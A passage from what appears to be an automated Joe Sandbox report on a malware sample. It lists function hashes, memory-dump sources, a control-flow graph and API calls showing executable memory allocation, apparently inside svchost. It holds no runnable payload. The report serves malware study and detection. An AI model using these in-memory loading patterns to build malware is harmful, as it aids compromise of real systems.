                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_57c0000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                                              • Opcode ID: 8e337c051352bb59bcf0f3e949b19c359aa7679b3f66dd0795ae1ab95d356fad
                                                                                                                                                                                                                                                                                                              • Instruction ID: 9fac1b3ea14084d94f028c2a7bf02bb2871d51829a4259c44c3abdde3a6a0b3e
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8e337c051352bb59bcf0f3e949b19c359aa7679b3f66dd0795ae1ab95d356fad
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 66C00276E5001A9A8B00DAD9E4508DCB774EB94321B004026D214A6104D63115268B50
                                                                                                                                                                                                                                                                                                              Function 057936F0 Relevance: .0, Instructions: 9COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2228397978.0000000005790000.00000040.00000800.00020000.00000000.sdmp, Offset: 05790000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_5790000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                                              • Opcode ID: bdf35e99dd36ce7f620ce7cd8a042c56ac5daffdf04b07b63f136acddd22bb66
                                                                                                                                                                                                                                                                                                              • Instruction ID: 939a312482121f2174412f330171f626f97e97abdb96a2345032c2dbabf298b2
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bdf35e99dd36ce7f620ce7cd8a042c56ac5daffdf04b07b63f136acddd22bb66
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 29B012FB944A00FFFE1D2504ED8FB402C908321702F044C107602943CBE5D160407477
                                                                                                                                                                                                                                                                                                              Function 0579D3A0 Relevance: .0, Instructions: 8COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2228397978.0000000005790000.00000040.00000800.00020000.00000000.sdmp, Offset: 05790000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_5790000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                                              • Opcode ID: ce51fb40863f2f46db07c84538258731d59b405b561d090277b17afe18d013e3
                                                                                                                                                                                                                                                                                                              • Instruction ID: 6a648aaaa2f9179b6465a08f1c25545d8ddad7d3eac392e33a8056e071dfafb8
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ce51fb40863f2f46db07c84538258731d59b405b561d090277b17afe18d013e3
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F7B09244E0A3C1488E2933F1382D82C251929510303C10B824231824E2C82849102131
                                                                                                                                                                                                                                                                                                              Function 0579F870 Relevance: .0, Instructions: 8COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2228397978.0000000005790000.00000040.00000800.00020000.00000000.sdmp, Offset: 05790000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_5790000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                                              • Opcode ID: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
                                                                                                                                                                                                                                                                                                              • Instruction ID: a5ced1602b898661de329531365079a034e3d75a808f59c5ffcbefa728424f66
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 58C0927A140208EFC700DF69E848C85BBB8EF1977171180A1FA088B332C732EC60DA94
                                                                                                                                                                                                                                                                                                              Function 021B17A8 Relevance: .0, Instructions: 7COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2218058169.00000000021B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021B0000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_21b0000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                                              • Opcode ID: cebd5aa2ed91b6e177991c95dcd90c9c05f9168390e9ecc90ef1a6957c69c159
                                                                                                                                                                                                                                                                                                              • Instruction ID: cc02fc3d4650cd1f8808d9472d18aa0d24f1d94c9a1bf61b95b9839ce96bd568
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cebd5aa2ed91b6e177991c95dcd90c9c05f9168390e9ecc90ef1a6957c69c159
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 90A0122459470E4F890033B4341802C379C65481003C00010940E42200DC1554100580
                                                                                                                                                                                                                                                                                                              Function 021B08B0 Relevance: .0, Instructions: 5COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2218058169.00000000021B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021B0000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_21b0000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                                              • Opcode ID: 21145916fa46e2472fcaf79e44284686b93aff1949dc5ae32ed430adf94ede67
                                                                                                                                                                                                                                                                                                              • Instruction ID: 31088f9dd3ba49e0483a124062096e4db3d3a72eb7e7daa95be191f1393a3b44
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 21145916fa46e2472fcaf79e44284686b93aff1949dc5ae32ed430adf94ede67
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D9900231058B0CCF4A402795780A555775CE5485157D50051F50E415115A5568105995
                                                                                                                                                                                                                                                                                                              Function 057965FB Relevance: .0, Instructions: 5COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2228397978.0000000005790000.00000040.00000800.00020000.00000000.sdmp, Offset: 05790000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_5790000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                                              • Opcode ID: 55db27ffe4813877b9776214880a608adcd23317472c040b6ef6b99269ac2b7e
                                                                                                                                                                                                                                                                                                              • Instruction ID: 56830cdb4cc263b65398c3d859813e52110035785f77f98f4fdde13a73a5caf8
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 55db27ffe4813877b9776214880a608adcd23317472c040b6ef6b99269ac2b7e
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 68B012324241206E860A9610CD0B4397921E7A43C4710CC35B10082014CB704821F700

                                                                                                                                                                                                                                                                                                              Non-executed Functions

                                                                                                                                                                                                                                                                                                              Function 055D0DE0 Relevance: .1, Instructions: 114COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2226911411.00000000055D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054B0000, based on PE: true
                                                                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2226411527.00000000054B0000.00000004.08000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_54b0000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                                              • Opcode ID: 43d453880de89c5f5618cc0e86a87a411c152be4e0b931f6ae5344a2d6435843
                                                                                                                                                                                                                                                                                                              • Instruction ID: 03e64ff493f889e6ed90d3cd382714bb032296e9a19f33c6125efc1ee519ae1d
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 43d453880de89c5f5618cc0e86a87a411c152be4e0b931f6ae5344a2d6435843
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2341C1B5D00248DFDB24CFA9D888A9DFBF1FB09310F209129E859B72A0E7749985CF55
                                                                                                                                                                                                                                                                                                              Function 0561DE30 Relevance: .1, Instructions: 66COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2227425285.0000000005610000.00000040.00000800.00020000.00000000.sdmp, Offset: 05610000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_5610000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                                              • Opcode ID: f981ca7e9f91a700b95fc713c25304ead1bc15a625a284e16e124b85c8496ecc
                                                                                                                                                                                                                                                                                                              • Instruction ID: cb3d9b77b858bfde95f94d97ff9aabc93b552fac7ae8ae7a5dc99ff27a808d41
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f981ca7e9f91a700b95fc713c25304ead1bc15a625a284e16e124b85c8496ecc
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2621CDB5D042189FCB14DFA9D980AEEFBF5FB49320F14902AE805B7250C735A945CFA8
                                                                                                                                                                                                                                                                                                              Function 0561DE28 Relevance: .1, Instructions: 65COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2227425285.0000000005610000.00000040.00000800.00020000.00000000.sdmp, Offset: 05610000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_5610000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                                              • Opcode ID: 134be352283e625b4e1ebd523aa43a6b40958f37b1530645b81e257a4b9c8be6
                                                                                                                                                                                                                                                                                                              • Instruction ID: f7f443751e1167e7fa131c391862493c37f4d3e2d3af44aae5c6004c72df183c
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 134be352283e625b4e1ebd523aa43a6b40958f37b1530645b81e257a4b9c8be6
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0D21BCB5D05218DBCB14CFA9D980AEEBBF1FB49310F14942AE809B7250C735A945CFA8
                                                                                                                                                                                                                                                                                                              Function 057C1E97 Relevance: 5.1, Strings: 4, Instructions: 74COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2228715270.00000000057C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057C0000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_57c0000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID: "$0Nj$\${
                                                                                                                                                                                                                                                                                                              • API String ID: 0-88659242
                                                                                                                                                                                                                                                                                                              • Opcode ID: 096fb361147ae895e034907caf03740e92d91deface1f42bb5e956d4195bc099
                                                                                                                                                                                                                                                                                                              • Instruction ID: 63a7ccfbed71eaf2a19227af580bc7bbcab6d00bf98054459269d2b264a947dc
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 096fb361147ae895e034907caf03740e92d91deface1f42bb5e956d4195bc099
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9E4107B4911229CFDB20EF65D88DB9DBBB1BF49304F1085EEE409A7281CB744A84DF41
                                                                                                                                                                                                                                                                                                              Function 05C24672 Relevance: 5.1, Strings: 4, Instructions: 52COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2230065854.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_5c20000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID: 0Nj$8$m$s
                                                                                                                                                                                                                                                                                                              • API String ID: 0-2168324693
                                                                                                                                                                                                                                                                                                              • Opcode ID: 385f19fcf6248c277bce34b91bdd86e1a44d7bb53ffd77faf56db828c124666a
                                                                                                                                                                                                                                                                                                              • Instruction ID: 496e216af3ae23fc905a7077c3f4a911173eeb8e4d98a684ac519b2d58cef4c8
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 385f19fcf6248c277bce34b91bdd86e1a44d7bb53ffd77faf56db828c124666a
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3C21727494522D8FDB68DF28D989BE9BAB1FB58305F0004EAD50EA3241DB745A88DF05
                                                                                                                                                                                                                                                                                                              Function 057C1F61 Relevance: 5.0, Strings: 4, Instructions: 39COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2228715270.00000000057C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057C0000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_57c0000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID: 0Nj$W$\$q
                                                                                                                                                                                                                                                                                                              • API String ID: 0-1375407170
                                                                                                                                                                                                                                                                                                              • Opcode ID: 8e67babddb3d0a62f7706132924c4f3e82d904dc071649d27abfb7e089a7a80a
                                                                                                                                                                                                                                                                                                              • Instruction ID: 2e77a8e1c8df0a0fe464eb10851bb718f33b9fac3b8c1626bb0657f6fd69ea57
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8e67babddb3d0a62f7706132924c4f3e82d904dc071649d27abfb7e089a7a80a
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9711C5B491026CCFDB20DF28E888B9DBBB5BB45305F1081EEA809A7385DB345A84DF45

                                                                                                                                                                                                                                                                                                              Executed Functions

                                                                                                                                                                                                                                                                                                              Function 02B702D8 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 169memoryfileCOMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,?,?), ref: 02B70326
                                                                                                                                                                                                                                                                                                                • Part of subcall function 02B700A4: VirtualAlloc.KERNELBASE(00000000,00001012,00001000,00000004), ref: 02B700CD
                                                                                                                                                                                                                                                                                                                • Part of subcall function 02B700A4: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 02B70279
                                                                                                                                                                                                                                                                                                              • VirtualAlloc.KERNELBASE(00000000,00400000,00001000,00000004), ref: 02B70378
                                                                                                                                                                                                                                                                                                              • VirtualProtect.KERNELBASE(0000002C,?,00000040,?), ref: 02B703E7
                                                                                                                                                                                                                                                                                                              • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 02B70407
                                                                                                                                                                                                                                                                                                              • MapViewOfFile.KERNELBASE(?,00000004,00000000,00000000,00000000), ref: 02B7042E
                                                                                                                                                                                                                                                                                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 02B70456
                                                                                                                                                                                                                                                                                                              • CloseHandle.KERNELBASE(?), ref: 02B70471
                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000007.00000003.2228919896.0000000002B70000.00000040.00000001.00020000.00000000.sdmp, Offset: 02B70000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_7_3_2b70000_svchost.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: Virtual$Alloc$Free$CloseFileHandleProtectView
                                                                                                                                                                                                                                                                                                              • String ID: ,
                                                                                                                                                                                                                                                                                                              • API String ID: 3867569247-3772416878
                                                                                                                                                                                                                                                                                                              • Opcode ID: 35eb397ea14406336b01ea38f36e06f8461e94550e7b98cd084062937234d485
                                                                                                                                                                                                                                                                                                              • Instruction ID: aeb60e16ab6fc66af2a6d801db6a5f12fb20e0554cc918b570b6413523f0fa5a
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 35eb397ea14406336b01ea38f36e06f8461e94550e7b98cd084062937234d485
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5C61EFB5900209EFDB10DFA5C984ADEBBB9FF08354F14C96AE969A7240D770E941CF60
                                                                                                                                                                                                                                                                                                              Function 02B700A4 Relevance: 2.7, APIs: 2, Instructions: 163memoryCOMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              • VirtualAlloc.KERNELBASE(00000000,00001012,00001000,00000004), ref: 02B700CD
                                                                                                                                                                                                                                                                                                              • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 02B70279
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000007.00000003.2228919896.0000000002B70000.00000040.00000001.00020000.00000000.sdmp, Offset: 02B70000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_7_3_2b70000_svchost.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: Virtual$AllocFree
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 2087232378-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: 7dc8e79fde86babc96161718fc4e5f80a5398d7d893a888eaa0e52eee754c683
                                                                                                                                                                                                                                                                                                              • Instruction ID: f695d97f15763cbad63370ad2efca5d14187cdea989876f74e21a63cf5b39d6a
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7dc8e79fde86babc96161718fc4e5f80a5398d7d893a888eaa0e52eee754c683
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F3718C72A04249DFDB41EF98C881BEDBBF0EB19314F244496E4A5FB641C334AA91CF64

                                                                                                                                                                                                                                                                                                              Non-executed Functions

                                                                                                                                                                                                                                                                                                              Function 02B70283 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000007.00000003.2228919896.0000000002B70000.00000040.00000001.00020000.00000000.sdmp, Offset: 02B70000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_7_3_2b70000_svchost.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                                              • Opcode ID: d558d006f42668ff0cb3938fe5626bc0e09627662ae6e14989234e2d35bd114b
                                                                                                                                                                                                                                                                                                              • Instruction ID: 25b12ffdecccb5d5f69d571c2dcc3c76f53c1219ea604b624aca769a6a69553a
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d558d006f42668ff0cb3938fe5626bc0e09627662ae6e14989234e2d35bd114b
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 54F09676A01200CFC714EF09C544DA677F6FBA5714B6548D6D454EB2A1D3B0DD49C750

                                                                                                                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                                                                                                                              Execution Coverage:18.3%
                                                                                                                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                                                                              Signature Coverage:0%
                                                                                                                                                                                                                                                                                                              Total number of Nodes:6
                                                                                                                                                                                                                                                                                                              Total number of Limit Nodes:0
                                                                                                                                                                                                                                                                                                              execution_graph 13349 980e38 13350 980e79 CloseHandle 13349->13350 13351 980ea6 13350->13351 13352 980d68 13353 980db3 GetTokenInformation 13352->13353 13354 980df6 13353->13354

                                                                                                                                                                                                                                                                                                              Executed Functions

                                                                                                                                                                                                                                                                                                              Function 0098CA29 Relevance: 1.8, Strings: 1, Instructions: 500COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                                                                              control_flow_graph 1523 98ca29-98ca6a call 98c7d0 1690 98ca6c call 98cfa8 1523->1690 1691 98ca6c call 98ca29 1523->1691 1526 98ca72-98ca80 1528 98ca82-98ca84 1526->1528 1529 98ca86-98ca8a 1526->1529 1530 98ca90-98cab3 1528->1530 1529->1530 1535 98cabf-98cacb 1530->1535 1536 98cab5-98caba 1530->1536 1541 98cacd-98caf9 call 98c0d0 1535->1541 1542 98cafe-98cb0a 1535->1542 1537 98cb9b-98cba1 1536->1537 1539 98cba3 1537->1539 1540 98cba7-98cbc7 1537->1540 1539->1540 1553 98cbc9-98cbce 1540->1553 1554 98cbd3-98cbe8 1540->1554 1541->1537 1548 98cb0c-98cb11 1542->1548 1549 98cb16-98cb2a 1542->1549 1548->1537 1558 98cb2c-98cb4e 1549->1558 1559 98cb96 1549->1559 1556 98cc70-98cc7e 1553->1556 1567 98cc6b 1554->1567 1568 98cbee-98cbfe 1554->1568 1563 98cc80-98cc84 1556->1563 1564 98cc96-98cca2 1556->1564 1580 98cb50-98cb72 1558->1580 1581 98cb74-98cb8d 1558->1581 1559->1537 1569 98cc8c-98cc8e 1563->1569 1572 98cca8-98ccc4 1564->1572 1573 98cd86-98cdba 1564->1573 1567->1556 1576 98cc00-98cc10 1568->1576 1577 98cc12-98cc17 1568->1577 1569->1564 1588 98cd72-98cd80 1572->1588 1596 98cdbc-98cdd0 1573->1596 1597 98cdd2-98cdd4 1573->1597 1576->1577 1587 98cc19-98cc29 1576->1587 1577->1556 1580->1559 1580->1581 1581->1559 1598 98cb8f-98cb94 1581->1598 1594 98cc2b-98cc30 1587->1594 1595 98cc32-98cc42 1587->1595 1588->1573 1589 98ccc9-98ccd2 1588->1589 1599 98ccd8-98cceb 1589->1599 1600 98cf91-98cfb8 1589->1600 1594->1556 1610 98cc4b-98cc5b 1595->1610 1611 98cc44-98cc49 1595->1611 1596->1597 1602 98ce04-98ce44 1597->1602 1603 98cdd6-98cde8 1597->1603 1598->1537 1599->1600 1604 98ccf1-98cd03 1599->1604 1618 98d04c-98d09d 1600->1618 1619 98cfbe-98cfc0 1600->1619 1692 98ce46 call 98d688 1602->1692 1693 98ce46 call 98d679 1602->1693 1603->1602 1614 98cdea-98cdfc 1603->1614 1615 98cd6f 1604->1615 1616 98cd05-98cd11 1604->1616 1625 98cc5d-98cc62 1610->1625 1626 98cc64-98cc69 1610->1626 1611->1556 1614->1602 1615->1588 1616->1600 1620 98cd17-98cd6c 1616->1620 1654 98d0ad-98d0b7 1618->1654 1655 98d09f-98d0ac 1618->1655 1619->1618 1623 98cfc6-98cfc8 1619->1623 1620->1615 1623->1618 1628 98cfce-98cfd2 1623->1628 1625->1556 1626->1556 1628->1618 1631 98cfd4-98cfd8 1628->1631 1630 98ce4c-98ce60 1646 98ce62-98ce79 1630->1646 1647 98cea7-98cef4 1630->1647 1632 98cfea-98d02c call 987958 1631->1632 1633 98cfda-98cfe8 1631->1633 1641 98d034-98d049 1632->1641 1633->1641 1660 98ce7b-98ce85 1646->1660 1661 98ce87-98ce9f call 98c0d0 1646->1661 1672 98cf48-98cf5f 1647->1672 1673 98cef6-98cf0f 1647->1673 1665 98d0b9-98d0c4 1654->1665 1666 98d0c6-98d0cc 1654->1666 1660->1661 1661->1647 1675 98d0ce-98d114 1665->1675 1666->1675 1679 98cf61-98cf7c 1672->1679 1680 98cf85-98cf8e 1672->1680 1681 98cf19-98cf45 1673->1681 1682 98cf11 1673->1682 1679->1680 1681->1672 1682->1681 1690->1526 1691->1526 1692->1630 1693->1630
                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.2247076065.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_980000_medicallanalysis.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID: {r
                                                                                                                                                                                                                                                                                                              • API String ID: 0-3050057695
                                                                                                                                                                                                                                                                                                              • Opcode ID: bf90a9d19350ecf8ae5f25622e8e63c5fd1bf2cab0290fe4a5695783bafe4731
                                                                                                                                                                                                                                                                                                              • Instruction ID: d9fe2415aca5675c85093b420868aff3a5f9242c408180844b0f6a1913db543c
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bf90a9d19350ecf8ae5f25622e8e63c5fd1bf2cab0290fe4a5695783bafe4731
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 571226747006058FDB14EF29C884A6ABBF6FF89304B2584A9E546CB376DB35EC45CB60
                                                                                                                                                                                                                                                                                                              Function 05373408 Relevance: 2.9, Strings: 2, Instructions: 437COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                                                                              • Not Executed
